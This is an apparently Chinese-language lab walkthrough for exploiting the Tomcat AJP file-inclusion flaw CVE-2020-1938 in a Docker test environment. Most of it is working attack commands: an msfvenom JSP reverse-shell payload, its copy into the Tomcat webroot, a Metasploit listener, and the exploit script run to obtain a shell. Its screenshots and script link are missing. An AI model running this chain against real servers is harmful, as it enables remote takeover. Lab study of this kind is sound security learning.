一、环境搭建
机器:kali Linux
Java:jdk11
python:2.7.x
二、用docker开启漏洞环境
笔者这里是修改了端口,一开始开启环境是默认端口应为8080
用docker-compose开启环境前,先安装docker和docker-compose
docker部署链接:
https://blog.csdn.net/m0_67844671/article/details/132872790
三、下载脚本
脚本下载地址:
四、查看脚本用法
五、尝试利用脚本文件包含
六、利用msfvenom生成木马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.217.128 LPORT=4444 R > muma.txt
七、利用docker复制木马进去容器内部模拟文件上传成功
docker cp muma.txt 188fb6f53492:/usr/local/tomcat/webapps/ROOT/muma.txt
上传成功如下图所示:
八、利用msfconsole开启监听
msfconsole
handler -p java/jsp_shell_reverse_tcp -H 0.0.0.0 -P 4444
九、利用脚本getshell
python2 CVE-2020-1938.py 192.168.217.128 -p 8009 -f /muma.txt -c 1
十、回到msfconsole查看是否有会话
如上图所示即反弹shell成功!